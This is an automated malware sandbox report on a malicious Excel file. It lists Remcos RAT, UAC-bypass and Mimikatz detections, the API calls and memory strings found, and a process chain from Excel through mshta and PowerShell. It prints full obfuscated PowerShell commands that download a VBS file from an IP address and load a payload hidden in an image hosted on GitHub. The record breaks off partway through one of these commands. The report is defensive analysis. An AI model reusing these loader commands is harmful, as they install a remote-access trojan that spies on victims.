                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3904, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3392, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: bhv8F64.tmp.24.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/49@8/5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,24_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,26_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,31_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,24_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,24_2_00413D4C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,24_2_0040B58D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\7D330000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA2A4.tmpJump to behavior
                  Source: 037002451082_10142024.xlsOLE indicator, Workbook stream: true
                  Source: 7D330000.0.drOLE indicator, Workbook stream: true
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m......P................x......P.......P........n.......x......3x......................P..............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(x.......................m.....}..w......m.......x.......x......1x.....(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w..............x.......x......1x.....(.P.......x......3x.....................@'..............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Pk....}..w....@'......\.z.......x.............(.P.....................(...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@'......}..w............p$Y.....d.Pk......X.....(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Pk....}..w....@'......\.z.......x.............(.P.....................(...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@'......}..w............p$Y.....d.Pk......X.....(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.p$Y.....d.Pk......X.....(.P............................. .......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.v.i.c.E.C.r.E.d.e.n.t.i.a.L.d.E.p.l.o.y.m.e.N.t...e.X.e.........................@.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@'......}..w............p$Y.....d.Pk......X.....(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@'......}..w............p$Y.....d.Pk......X.....(.P.............................l.......................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@'......}..w............p$Y.....d.Pk......X.....(.P.....................................................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w..............x.......x......1x.....(.P.......x......3x.....H................=t.............Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(x.......................m.....}..w......m.......x.......x......1x.....(.P.....H.......P.......H...............................Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m.......................x.......................n.......x......3x.....x...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(x.......................m.....}..w......m.......x.......x......1x.....(.P.....<...............x...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..$..............P................m.......m.....}..w..............x.......x......1x.....(.P.......x......3x.......$.............`...............
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................S.l....}..w....`.......\.z.......x.............(.P.....<...............................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..$.....................................`.......}..w..............c.....BP.l......b.....(.P.....<.................$.............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................S.l....}..w....`.......\.z.......x.............(.P.....<...............................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..$.....................................`.......}..w..............c.....BP.l......b.....(.P.....<.................$.............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....8.......N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...c.....BP.l......b.....(.P.....<...............8....... .......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.v.i.c.E.C.r.E.d.e.n.t.i.a.L.d.E.p.l.o.y.m.e.N.t...e.X.e.<...............8.......@.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.<...............8.......@.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..$.....................................`.......}..w..............c.....BP.l......b.....(.P.....<.................$.............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...8.......N.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..$.....................................`.......}..w..............c.....BP.l......b.....(.P.....<.................$.....l.......................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`.......}..w..............c.....BP.l......b.....(.P.....<...............8...............................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w..............x.......x......1x.....(.P.......x......3x.....................................
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(x.......................m.....}..w......m.......x.......x......1x.....(.P.....L...............................................
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: 037002451082_10142024.xlsVirustotal: Detection: 7%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_25-33280
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = 